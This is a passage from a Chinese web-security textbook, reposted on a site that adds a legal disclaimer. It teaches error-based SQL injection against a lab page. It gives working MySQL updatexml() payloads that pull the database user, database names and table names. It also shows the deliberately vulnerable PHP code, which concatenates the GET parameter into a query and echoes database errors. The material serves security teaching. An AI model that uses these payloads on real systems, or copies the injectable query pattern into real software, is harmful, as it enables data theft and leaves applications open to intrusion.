报错注入攻击

报错注入攻击的测试地址在本书第2章。

先访问error.php?username=1'，因为参数username的值是1'。在数据库中执行SQL时，会因为多了一个单引号而报错，输出到页面的结果如图4-35所示。

图4-35  

通过页面返回结果可以看出，程序直接将错误信息输出到了页面上，所以此处可以利用报错注入获取数据。报错注入有多种利用方式，此处只讲解利用MySQL函数updatexml()获取user()的值，SQL语句如下：

1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

其中0x7e是ASCII编码，解码结果为~，如图4-36所示。

图4-36

然后尝试获取当前数据库的库名，语句如下：

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

得到的结果如图4-37所示。

图4-37  

接着可以利用select语句继续获取数据库中的库名、表名和字段名，查询语句与Union注入的查询语句相同。因为报错注入只显示一条结果，所以需要使用limit语句。构造的语句如下：

1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+

结果如图4-38所示，可以获取数据库的库名。

图4-38  

构造查询表名的语句如下：

1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema= 'test' limit 0,1),0x7e),1)--+

如图4-39所示，可以获取数据库test的表名。

图4-39

报错注入代码分析

在报错注入页面，程序获取GET参数username后，将username拼接到SQL语句中，然后到数据库查询。如果执行成功，就输出ok；如果出错，则通过echo mysqli_error($con)将错误信息输出到页面（mysqli_error返回上一个MySQL函数的错误），代码如下：

<?php$con=mysqli_connect("localhost","root","123456","test");if (mysqli_connect_errno()){echo "连接失败: " . mysqli_connect_error();}$username = $_GET['username'];if($result = mysqli_query($con,"select * from users where `username`='".$username."'")){echo "ok";}else{echo mysqli_error($con);}?>

输入username=1'时，SQL语句为select * from users where `username`='1''。执行时，会因为多了一个单引号而报错。利用这种错误回显，可以通过floor()、updatexml()等函数将要查询的内容输出到页面上。

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）